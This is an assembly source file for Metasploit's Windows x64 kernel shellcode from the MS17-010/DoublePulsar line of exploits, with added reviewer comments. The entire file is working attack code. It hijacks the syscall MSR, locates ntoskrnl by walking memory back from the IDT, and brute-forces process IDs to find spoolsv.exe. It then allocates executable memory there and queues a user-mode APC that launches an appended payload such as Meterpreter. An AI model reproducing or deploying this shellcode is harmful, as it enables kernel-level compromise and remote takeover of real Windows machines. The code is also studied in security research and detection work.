;
; Windows x86/x64 Multi-Arch Kernel Ring 0 to Ring 3 via Queued APC Shellcode
;
; Author: Sean Dillon (@zerosum0x0)
; Copyright: (c) 2017 RiskSense, Inc.
; Release: 04 May 2017
; License: MSF License
; Build: nasm ./kernel.asm
; Acknowledgements: Stephen Fewer, skape, Equation Group, Shadow Brokers
;
; Description:
;   Injects an APC into a specified process. Once in userland, a new thread is
;   created to host the main payload. Add whatever userland payload you want to
;   the end, prepended with two bytes that equal the little endian size of your
;   payload. The userland payload should detect arch if multi-arch is enabled.
;   This payload is convenient; smaller or null-free payloads can be crafted
;   using this as a base template.
;
; References:
;   https://github.com/Risksense-Ops/MS17-010
;   https://msdn.microsoft.com/en-us/library/9z1stfyw.aspx
;   https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html
;   https://countercept.com/our-thinking/analyzing-the-doublepulsar-kernel-dll-injection-technique/
;   http://apexesnsyscalls.blogspot.com/2011/09/using-apcs-to-inject-your-dll.html
;
; Provenance: this text was recovered from a unified diff that adds
;   external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm
;
; Syntax / target: NASM, Intel operand order, 64-bit code, flat binary (ORG 0).
; Calls into ntoskrnl/kernel32 pass arguments in rcx, rdx, r8, r9 and reserve
; 0x20 bytes of shadow space before each call.
;
; NOTE(review): USE_X86 is defined below, but no 32-bit code path is present
;   in this file as seen here -- confirm whether the x86 half lives elsewhere.
;

BITS 64
ORG 0
default rel

section .text
global payload_start

; options which have set values
%define PROCESS_HASH SPOOLSV_EXE_HASH ; the process to queue APC into
%define MAX_PID 0x10000
%define WINDOWS_BUILD 7601 ; offsets appear relatively stable

; options which can be enabled
%define USE_X86 ; x86 payload
%define USE_X64 ; x64 payload
%define STATIC_ETHREAD_DELTA ; use a pre-calculated ThreadListEntry
%define ERROR_CHECKS ; lessen chance of BSOD, but bigger size
%define SYSCALL_OVERWRITE ; to run at process IRQL in syscall
; %define CLEAR_DIRECTION_FLAG ; if cld should be run

; hashes for export directory lookups
; (values are compared against the output of x64_calc_hash / x64_block_find_dll)
LSASS_EXE_HASH                      equ 0x60795e4a ; hash("lsass.exe")
SPOOLSV_EXE_HASH                    equ 0xdd1f77bf ; hash("spoolsv.exe")
CREATETHREAD_HASH                   equ 0x221b4546 ; hash("CreateThread")
PSGETCURRENTPROCESS_HASH            equ 0x6211725c ; hash("PsGetCurrentProcess")
PSLOOKUPPROCESSBYPROCESSID_HASH     equ 0x4ba25566 ; hash("PsLookupProcessByProcessId")
PSGETPROCESSIMAGEFILENAME_HASH      equ 0x2d726fa3 ; hash("PsGetProcessImageFileName")
PSGETTHREADTEB_HASH                 equ 0x9d364026 ; hash("PsGetThreadTeb")
KEGETCURRENTPROCESS_HASH            equ 0x5e91685c ; hash("KeGetCurrentProcess")
KEGETCURRENTTHREAD_HASH             equ 0x30a3ba7a ; hash("KeGetCurrentThread")
KEINITIALIZEAPC_HASH                equ 0x4b55ceac ; hash("KeInitializeApc")
KEINSERTQUEUEAPC_HASH               equ 0x9e093818 ; hash("KeInsertQueueApc")
KESTACKATTACHPROCESS_HASH           equ 0xdc1124e5 ; hash("KeStackAttachProcess")
KEUNSTACKDETACHPROCESS_HASH         equ 0x7db3b722 ; hash("KeUnstackDetachProcess")
ZWALLOCATEVIRTUALMEMORY_HASH        equ 0xee0aca4b ; hash("ZwAllocateVirtualMemory")
EXALLOCATEPOOL_HASH                 equ 0x9150ac26 ; hash("ExAllocatePool")
OBDEREFERENCEOBJECT_HASH            equ 0x854de20d ; hash("ObDereferenceObject")
KERNEL32_DLL_HASH                   equ 0x92af16da ; hash_U(L"kernel32.dll", len)

; offsets for opaque structures
; NOTE: these are only defined for WINDOWS_BUILD == 7601; any other value
; leaves the symbols undefined and the file will not assemble.
%if WINDOWS_BUILD == 7601
EPROCESS_THREADLISTHEAD_BLINK_OFFSET        equ 0x308
ETHREAD_ALERTABLE_OFFSET                    equ 0x4c
TEB_ACTIVATIONCONTEXTSTACKPOINTER_OFFSET    equ 0x2c8 ; ActivationContextStackPointer : Ptr64 _ACTIVATION_CONTEXT_STACK
ETHREAD_THREADLISTENTRY_OFFSET              equ 0x420 ; only used if STATIC_ETHREAD_DELTA defined
%endif

; now the shellcode begins
payload_start:

%ifdef SYSCALL_OVERWRITE
;-----------------------------------------------------------------------
; syscall_overwrite / x64_syscall_overwrite
; Purpose: read MSR 0xc0000082, stash its old 64-bit value at the fixed
;          address 0xffffffffffd00ff8, then point the MSR at
;          x64_syscall_handler and return to the caller.
; Clobb:   rax, rbx, rcx, rdx
;-----------------------------------------------------------------------
syscall_overwrite:

x64_syscall_overwrite:
    mov ecx, 0xc0000082                 ; IA32_LSTAR syscall MSR
    rdmsr                               ; edx:eax = current MSR value
    ;movabs rbx, 0xffffffffffd00ff8     ; (48 BB = mov rbx, imm64; hand-encoded)
    db 0x48, 0xbb, 0xf8, 0x0f, 0xd0, 0xff, 0xff, 0xff, 0xff, 0xff
    mov dword [rbx+0x4], edx            ; save old syscall handler
    mov dword [rbx], eax
    lea rax, [rel x64_syscall_handler]  ; load new syscall handler
    mov rdx, rax
    shr rdx, 0x20                       ; edx = high dword, eax = low dword for wrmsr

    wrmsr                               ; ecx still holds 0xc0000082 (rdmsr leaves it intact)
    ret

;-----------------------------------------------------------------------
; x64_syscall_handler
; Purpose: replacement handler installed by x64_syscall_overwrite. Switches
;          stacks, saves 15 general-purpose registers (0x78 bytes), restores
;          the original MSR value, runs x64_kernel_start once with interrupts
;          enabled, restores the registers, then jumps to the saved handler.
; NOTE(review): the gs:0x10 / gs:0x1a8 slots and the frame built by the
;          second group of pushes presumably mirror the native syscall entry
;          path for this build -- confirm against the target kernel.
;-----------------------------------------------------------------------
x64_syscall_handler:
    swapgs
    mov qword [gs:0x10], rsp            ; park the incoming rsp
    mov rsp, qword [gs:0x1a8]           ; switch to the stack pointer stored at gs:0x1a8

    ; 15 pushes = 0x78 bytes; undone by "sub rsp, 0x78" + pops on the exit path
    push rax
    push rbx
    push rcx
    push rdx
    push rsi
    push rdi
    push rbp
    push r8
    push r9
    push r10
    push r11
    push r12
    push r13
    push r14
    push r15

    push 0x2b
    push qword [gs:0x10]                ; the rsp parked above
    push r11
    push 0x33
    push rcx
    mov rcx, r10
    sub rsp, 0x8
    push rbp
    sub rsp, 0x158
    lea rbp, [rsp + 0x80]

    mov qword [rbp+0xc0],rbx
    mov qword [rbp+0xc8],rdi
    mov qword [rbp+0xd0],rsi

    ;movabs rax, [0xffffffffffd00ff8]   ; 48 A1 = mov rax, moffs64: this LOADS the
    ;                                   ; saved handler value, it is not an immediate move
    db 0x48, 0xa1, 0xf8, 0x0f, 0xd0, 0xff, 0xff, 0xff, 0xff, 0xff

    mov rdx, rax
    shr rdx, 0x20                       ; edx = high dword of saved handler
    xor rbx, rbx
    dec ebx                             ; rbx = 0x00000000ffffffff
    and rax, rbx                        ; eax = low dword of saved handler
    mov ecx, 0xc0000082
    wrmsr                               ; put the original handler back in the MSR
    sti

    call x64_kernel_start

    cli
    mov rsp, qword [abs gs:0x1a8]
    sub rsp, 0x78                       ; rsp -> the 15 registers saved on entry
    pop r15
    pop r14
    pop r13
    pop r12
    pop r11
    pop r10
    pop r9
    pop r8
    pop rbp
    pop rdi
    pop rsi
    pop rdx
    pop rcx
    pop rbx
    pop rax
    mov rsp, qword [abs gs:0x10]        ; back to the rsp parked on entry
    swapgs
    jmp [0xffffffffffd00ff8]            ; continue in the saved (original) handler

; SYSCALL_OVERWRITE
%endif

;-----------------------------------------------------------------------
; x64_kernel_start
; Purpose: locate the ntoskrnl image, find the process whose image-name hash
;          equals PROCESS_HASH, attach to it, allocate a page, copy the
;          userland stub + payload there, and queue a user-mode APC at it.
; Out:     returns via ret with rsi, r15, r14, r13, r12, rbx, rbp restored.
;
; Scratch storage: the first bytes of x64_kernel_start itself are reused as
; data once they have executed (r14 points at them):
;   [r14 + 0]   PEPROCESS out-param, later the allocated base address
;   [r14 + 8]   RegionSize for ZwAllocateVirtualMemory
;   [r14 + 16]  KAPC_STATE for KeStackAttachProcess / KeUnstackDetachProcess
;-----------------------------------------------------------------------
x64_kernel_start:
; Some "globals", which should not be clobbered, these are also ABI non-volatile
; ----------------------------------------------
; r15 = ntoskrnl.exe base address (DOS MZ header)
; r14 = &x64_kernel_start
; r13 = PKAPC_STATE
; rbx = PID/PEPROCESS
; r12 = ThreadListEntry offset, later ETHREAD that is alertable
; rbp = current rsp

%ifdef CLEAR_DIRECTION_FLAG
    cld
%endif

    ; we will restore non-volatile registers
    push rsi                            ; save clobbered registers
    push r15                            ; r15 = ntoskrnl.exe
    push r14                            ; r14 = &x64_kernel_start
    push r13                            ; r13 = PKAPC_STATE
    push r12                            ; r12 = ETHREAD/offsets
    push rbx                            ; rbx = PID/EPROCESS

    push rbp

    mov rbp, rsp                        ; we'll use the base pointer
    and sp, 0xFFF0                      ; align stack to ABI boundary (16-bit op: only the
                                        ; low 4 bits of rsp change, upper bits are untouched)
    sub rsp, 0x20                       ; reserve shadow stack

    lea r14, [rel x64_kernel_start]     ; for use in pointers

; this stub loads ntoskrnl.exe into r15
x64_find_nt_idt:
    mov r15, qword [gs:0x38]            ; get IdtBase of KPCR
    mov r15, qword [r15 + 0x4]          ; get ISR address
                                        ; NOTE(review): this is a raw 8-byte read at offset 4
                                        ; of the first IDT entry; after the page mask below it
                                        ; is presumably only "near" the ISR -- good enough as a
                                        ; starting point for the backwards page walk. Confirm.
    shr r15, 0xc                        ; strip to page size
    shl r15, 0xc

_x64_find_nt_idt_walk_page:
    sub r15, 0x1000                     ; walk along page size
    mov rsi, qword [r15]
    cmp si, 0x5a4d                      ; 'MZ' header
    jne _x64_find_nt_idt_walk_page      ; no bound on this walk: it stops only at an 'MZ' page

; dynamically finds the offset to ETHREAD.ThreadListEntry
; (with STATIC_ETHREAD_DELTA defined, the constant is used instead)
find_threadlistentry_offset:

%ifdef STATIC_ETHREAD_DELTA
    mov r12, ETHREAD_THREADLISTENTRY_OFFSET
%else
    mov r11d, PSGETCURRENTPROCESS_HASH
    call x64_block_api_direct

    mov rsi, rax
    add rsi, EPROCESS_THREADLISTHEAD_BLINK_OFFSET ; PEPROCESS->ThreadListHead

    mov r11d, KEGETCURRENTTHREAD_HASH
    call x64_block_api_direct           ; rax = current thread object

    mov rcx, rsi                        ; save ThreadListHead

    ; Accept the first list entry that lies in [rax, rax + 0x500]; the
    ; difference (entry - rax) is taken as the ThreadListEntry offset.
_find_threadlistentry_offset_compare_threads:
    cmp rax, rsi
    ja _find_threadlistentry_offset_walk_threads
    lea rdx, [rax + 0x500]
    cmp rdx, rsi
    jb _find_threadlistentry_offset_walk_threads
    sub rsi, rax
    jmp _find_threadlistentry_offset_calc_thread_exit

_find_threadlistentry_offset_walk_threads:
    mov rsi, qword [rsi]                ; move up the list entries
    cmp rsi, rcx                        ; make sure we exit this loop at some point
    jne _find_threadlistentry_offset_compare_threads

_find_threadlistentry_offset_calc_thread_exit:
    mov r12, rsi
%endif

; now we need to find the EPROCESS to inject into
; Brute-forces PIDs 4, 8, 12, ... (step 4) up to MAX_PID.
x64_find_process_name:
    xor ebx, ebx

_x64_find_process_name_loop_pid:
    mov ecx, ebx
    add ecx, 0x4
%ifdef MAX_PID
    cmp ecx, MAX_PID
    jge x64_kernel_exit                 ; nothing attached yet, so skip the cleanup calls
%endif

    mov rdx, r14                        ; PEPROCESS*
    mov ebx, ecx                        ; save current PID

    ; PsLookupProcessById(dwPID, &x64_kernel_start);
    mov r11d, PSLOOKUPPROCESSBYPROCESSID_HASH
    call x64_block_api_direct

    test eax, eax                       ; see if STATUS_SUCCESS
    jnz _x64_find_process_name_loop_pid

    mov rcx, [r14]                      ; rcx = *PEPROCESS

    ; PsGetProcessImageFileName(*(&x64_kernel_start));
    mov r11d, PSGETPROCESSIMAGEFILENAME_HASH
    call x64_block_api_direct

    mov rsi, rax                        ; rsi = image file name string
    call x64_calc_hash                  ; r9d = hash of that string

    cmp r9d, PROCESS_HASH

    ; NOTE(review): on a name mismatch the loop continues without calling
    ; ObDereferenceObject on the process just looked up; only the matching
    ; process is dereferenced (in x64_kernel_exit_cleanup). Looks like a
    ; reference leak per non-matching PID -- confirm against the WDK docs.
    jne _x64_find_process_name_loop_pid

x64_attach_process:
    mov rbx, [r14]                      ; rbx = PEPROCESS (read from the scratch slot at r14)

    lea r13, [r14 + 16]
    mov rdx, r13                        ; rdx = (PRKAPC_STATE)&x64_kernel_start + 16
    mov rcx, rbx                        ; rcx = PEPROCESS

    ; KeStackAttachProcess(PEPROCESS, &x64_kernel_start + 16);
    mov r11d, KESTACKATTACHPROCESS_HASH
    call x64_block_api_direct

    ; ZwAllocateVirtualMemory
    ; The two pushes below are stack args 5 and 6; they are never popped and
    ; are discarded by "mov rsp, rbp" in x64_kernel_exit.
    push 0x40                           ; PAGE_EXECUTE_READWRITE
    push 0x1000                         ; AllocationType

    lea r9, [r14 + 8]                   ; r9 = pRegionSize
    mov qword [r9], 0x1000              ; *pRegionSize = 0x1000

    xor r8, r8                          ; ZeroBits = 0
    mov rdx, r14                        ; rdx = BaseAddress
    xor ecx, ecx
    mov qword [rdx], rcx                ; set *BaseAddress = NULL
    not rcx                             ; rcx = 0xffffffffffffffff

    ; ZwAllocateVirtualMemory(-1, &baseAddr, 0, &regionSize /* 0x1000 */, 0x1000, 0x40);
    mov r11d, ZWALLOCATEVIRTUALMEMORY_HASH
    sub rsp, 0x20                       ; we have to reserve new shadow stack
    call x64_block_api_direct

%ifdef ERROR_CHECKS
    test eax, eax
    jnz x64_kernel_exit_cleanup         ; allocation failed: detach + dereference, then exit
%endif

; rep movs kernel -> userland
; Copies everything from userland_start through the end of the appended
; payload into the freshly allocated page.
; NOTE(review): the length is not checked against the 0x1000-byte region
; requested above, and rep movsb relies on DF being clear (see
; CLEAR_DIRECTION_FLAG) -- confirm both for the payload in use.
x64_memcpy_userland_payload:
    mov rdi, [r14]                      ; rdi = allocated base address
    lea rsi, [rel userland_start]
    xor ecx, ecx
    add cx, word [rel userland_payload_size] ; size of payload userland
    add cx, userland_payload - userland_start ; size of our userland
    rep movsb

; Teb loop to find an alertable thread
; A thread is accepted when PsGetThreadTeb is non-NULL, the TEB field at
; TEB_ACTIVATIONCONTEXTSTACKPOINTER_OFFSET is non-NULL, and bit 5 of the
; dword at ETHREAD + ETHREAD_ALERTABLE_OFFSET is set.
x64_find_alertable_thread:
    mov rsi, rbx                        ; rsi = EPROCESS
    add rsi, EPROCESS_THREADLISTHEAD_BLINK_OFFSET ; rsi = EPROCESS.ThreadListHead.Blink

    mov rcx, rsi                        ; save the head pointer

_x64_find_alertable_thread_loop:
    mov rdx, [rcx]                      ; rdx = next list entry

%ifdef ERROR_CHECKS
; todo: don't cmp on first element
; cmp rsi, rcx
; je x64_kernel_exit_cleanup
; NOTE(review): with the check above disabled, this loop has no exit if no
; thread qualifies; it will wrap around through the list head.
%endif

    sub rdx, r12                        ; sub offset -> rdx = candidate ETHREAD
    push rcx                            ; preserve list cursor across the call
    push rdx                            ; preserve candidate ETHREAD across the call
    mov rcx, rdx

    sub rsp, 0x20
    mov r11d, PSGETTHREADTEB_HASH
    call x64_block_api_direct
    add rsp, 0x20

    pop rdx
    pop rcx

    test rax, rax                       ; check if TEB is NULL
    je _x64_find_alertable_thread_skip_next

    mov rax, qword [rax + TEB_ACTIVATIONCONTEXTSTACKPOINTER_OFFSET]
    test rax, rax
    je _x64_find_alertable_thread_skip_next

    add rdx, ETHREAD_ALERTABLE_OFFSET
    mov eax, dword [rdx]
    bt eax, 0x5                         ; CF = bit 5 of the flags dword
    jb _x64_find_alertable_thread_found

_x64_find_alertable_thread_skip_next:
    mov rcx, [rcx]                      ; advance the list cursor
    jmp _x64_find_alertable_thread_loop

_x64_find_alertable_thread_found:
    sub rdx, ETHREAD_ALERTABLE_OFFSET   ; undo the add above: rdx = ETHREAD again
    mov r12, rdx                        ; r12 = chosen ETHREAD

x64_create_apc:
    ; ExAllocatePool(POOL_TYPE.NonPagedPool, 0x90);
    xor edx, edx
    add dl, 0x90                        ; rdx = 0x90 (size)
    xor ecx, ecx                        ; rcx = 0 (pool type)
    mov r11d, EXALLOCATEPOOL_HASH
    call x64_block_api_direct
    ; NOTE(review): the returned pointer is used below without a NULL check,
    ; even when ERROR_CHECKS is defined.

    ;mov r12, rax
    ;mov r11d, KEGETCURRENTTHREAD_HASH
    ;call x64_block_api_direct

; KeInitializeApc(rcx = apc,
;                 rdx = pThread,
;                 r8 = NULL = OriginalApcEnvironment,
;                 r9 = KernelApcRoutine,
;                 NULL,
;                 InjectionShellCode,
;                 1 /* UserMode */,
;                 NULL /* Context */);
    mov rcx, rax                        ; pool APC
    lea r9, [rcx + 0x80]                ; dummy kernel APC function (lives in the same pool block)
    mov byte [r9], 0xc3                 ; ret

    mov rdx, r12                        ; pThread;
    mov r12, rax                        ; save APC
    xor r8, r8                          ; OriginalApcEnvironment = NULL

    ; stack args are pushed last-to-first
    push r8                             ; Context = NULL
    push 0x1                            ; UserMode
    mov rax, [r14]
    push rax                            ; userland shellcode
    push r8                             ; NULL

    sub rsp, 0x20
    mov r11d, KEINITIALIZEAPC_HASH
    call x64_block_api_direct

    ; KeInsertQueueApc(pAPC, NULL, NULL, NULL);
    xor edx, edx
    push rdx
    push rdx
    pop r8                              ; r8 = 0
    pop r9                              ; r9 = 0 (push/pop pair nets to no stack change)
    mov rcx, r12

    mov r11d, KEINSERTQUEUEAPC_HASH
    call x64_block_api_direct

x64_kernel_exit_cleanup:
    ; KeUnstackDetachProcess(pApcState)
    mov rcx, r13
    mov r11d, KEUNSTACKDETACHPROCESS_HASH
    call x64_block_api_direct

    ; ObDereferenceObject(PEPROCESS)
    mov rcx, rbx
    mov r11d, OBDEREFERENCEOBJECT_HASH
    call x64_block_api_direct

x64_kernel_exit:

    mov rsp, rbp                        ; fix stack (drops every push/sub made since the prologue)

    pop rbp

    pop rbx
    pop r12
    pop r13
    pop r14
    pop r15
    pop rsi                             ; restore clobbered registers and return

    ret

; Everything from userland_start onward is what x64_memcpy_userland_payload
; copies into the target process.
userland_start:

x64_userland_start:

    jmp x64_userland_start_thread       ; hop over the shared helpers below

;-----------------------------------------------------------------------
; x64_calc_hash
; user and kernel mode re-use this code
; In:    rsi = NUL-terminated byte string
; Out:   r9d = hash (rotate-right-13, add byte); rsi = one past the NUL
; Clobb: rax, r9, flags
; Note:  any byte that compares signed >= 'a' has 0x20 subtracted; there is
;        no upper bound at 'z'. The terminating NUL is folded into the hash
;        as well (rotate happens before the end-of-string test).
;-----------------------------------------------------------------------
x64_calc_hash:
    xor r9, r9

_x64_calc_hash_loop:
    xor eax, eax                        ; ah = 0 is relied on by "cmp al, ah" below
    lodsb                               ; Read in the next byte of the ASCII function name
    ror r9d, 13                         ; Rotate right our hash value
    cmp al, 'a'
    jl _x64_calc_hash_not_lowercase
    sub al, 0x20                        ; If so normalise to uppercase
_x64_calc_hash_not_lowercase:
    add r9d, eax                        ; Add the next byte of the name
    cmp al, ah                          ; Compare AL to AH (\0)
    jne _x64_calc_hash_loop

    ret

;-----------------------------------------------------------------------
; x64_block_find_dll
; Purpose: walk the loader's InMemoryOrder module list and find the module
;          whose name hash equals r11d.
; In:    r11d = module-name hash (e.g. KERNEL32_DLL_HASH)
; Out:   r15  = value at [entry + 32] of the matching entry (used as the
;               module base by x64_block_api_direct)
; Clobb: rax, rcx, rdx, rsi, r9, flags
; Note:  the name is hashed byte-by-byte over the UTF-16 buffer for the
;        length read from [entry + 74]; there is no end-of-list check.
;-----------------------------------------------------------------------
x64_block_find_dll:
    xor edx, edx
    mov rdx, [gs:rdx + 96]              ; PEB (gs:0x60)
    mov rdx, [rdx + 24]                 ; PEB->Ldr
    mov rdx, [rdx + 32]                 ; InMemoryOrder list

_x64_block_find_dll_next_mod:
    mov rdx, [rdx]                      ; advance to the next list entry
    mov rsi, [rdx + 80]                 ; unicode string
    movzx rcx, word [rdx + 74]          ; rcx = len

    xor r9d, r9d

_x64_block_find_dll_loop_mod_name:
    xor eax, eax
    lodsb
    cmp al, 'a'
    jl _x64_block_find_dll_not_lowercase
    sub al, 0x20

_x64_block_find_dll_not_lowercase:
    ror r9d, 13
    add r9d, eax
    loop _x64_block_find_dll_loop_mod_name

    cmp r9d, r11d
    jnz _x64_block_find_dll_next_mod

    mov r15, [rdx + 32]
    ret

;-----------------------------------------------------------------------
; x64_block_api_direct
; Purpose: resolve an export of the module at r15 by name hash and tail-jump
;          to it with the caller's argument registers intact, so a
;          "call x64_block_api_direct" behaves like a call to the API itself.
; In:    r15  = module base (MZ header)
;        r11d = hash of the export name (as produced by x64_calc_hash)
;        rcx, rdx, r8, r9 (+ stack) = arguments for the target function
; Out:   whatever the target function returns
; Clobb: rax, r11 (plus whatever the target clobbers); rcx, rdx, r8, r9 and
;        rsi are saved and restored before the jump
; Note:  searches the name table from the last entry backwards; a hash that
;        is not present is never detected (see the comment in the loop).
;-----------------------------------------------------------------------
x64_block_api_direct:
    mov rax, r15                        ; make copy of module

    push r9                             ; Save parameters
    push r8
    push rdx
    push rcx
    push rsi

    mov rdx, rax
    mov eax, dword [rdx+60]             ; Get PE header e_lfanew
    add rax, rdx
    mov eax, dword [rax+136]            ; Get export tables RVA

%ifdef ERROR_CHECKS
    ; test rax, rax ; EAT not found
    ; jz _block_api_not_found
%endif

    add rax, rdx
    push rax                            ; save EAT

    mov ecx, dword [rax+24]             ; export directory +24 = NumberOfNames (name count)
    mov r8d, dword [rax+32]             ; export directory +32 = AddressOfNames RVA
    add r8, rdx

_x64_block_api_direct_get_next_func:
    ; When we reach the start of the EAT (we search backwards), we hang or crash
    dec rcx                             ; step to the previous name index
    mov esi, dword [r8+rcx*4]           ; Get rva of next function name
    add rsi, rdx                        ; Add the modules base address

    call x64_calc_hash

    cmp r9d, r11d                       ; Compare the hashes
    jnz _x64_block_api_direct_get_next_func ; try the next function


_x64_block_api_direct_finish:

    pop rax                             ; restore EAT
    mov r8d, dword [rax+36]
    add r8, rdx                         ; ordinal table virtual address
    mov cx, [r8+2*rcx]                  ; desired functions ordinal (only cx is written; the
                                        ; upper bits of rcx keep the name index)
    mov r8d, dword [rax+28]             ; Get the function addresses table rva
    add r8, rdx                         ; Add the modules base address
    mov eax, dword [r8+4*rcx]           ; Get the desired functions RVA
    add rax, rdx                        ; Add the modules base address to get the functions actual VA

    pop rsi
    pop rcx
    pop rdx
    pop r8
    pop r9
    pop r11                             ; pop ret addr

    ; sub rsp, 0x20 ; shadow space
    push r11                            ; push ret addr (with the line above disabled, this
                                        ; pop/push pair leaves the stack unchanged)

    jmp rax                             ; tail-jump: the API returns straight to our caller


;-----------------------------------------------------------------------
; x64_userland_start_thread
; Purpose: user-mode APC body. Finds kernel32.dll, resolves CreateThread and
;          starts a thread at userland_payload, then returns.
; Clobb:   volatile registers; rsi, r15 and rbp are saved and restored
;-----------------------------------------------------------------------
x64_userland_start_thread:
    push rsi
    push r15
    push rbp

    mov rbp, rsp
    sub rsp, 0x20

    mov r11d, KERNEL32_DLL_HASH
    call x64_block_find_dll             ; r15 = kernel32 base

    xor ecx, ecx                        ; rcx = 0 -> lpThreadAttributes = NULL (arg 1)

    push rcx                            ; stays on the stack: lpThreadId = NULL (arg 6)
    push rcx                            ; stays on the stack: dwCreationFlags = 0 (arg 5)

    push rcx                            ; popped into rdx below
    push rcx                            ; popped into r9 below
    pop r9                              ; lpParameter = NULL (arg 4)
    lea r8, [rel userland_payload]      ; lpStartAddr = &threadstart (arg 3)
    pop rdx                             ; dwStackSize = 0 (arg 2)

    sub rsp, 0x20
    mov r11d, CREATETHREAD_HASH         ; hash("CreateThread")
    call x64_block_api_direct           ; CreateThread(NULL, 0, &threadstart, NULL, 0, NULL);

    mov rsp, rbp
    pop rbp
    pop r15
    pop rsi
    ret

; Little-endian 16-bit size of the payload that follows; read by
; x64_memcpy_userland_payload. The default 0x0001 matches the single
; placeholder "ret" below.
userland_payload_size:
    db 0x01
    db 0x00

; Entry point of the thread created by x64_userland_start_thread.
userland_payload:
    ; insert userland payload here
    ; such as meterpreter
    ; or reflective dll with the metasploit MZ pre-stub
    ret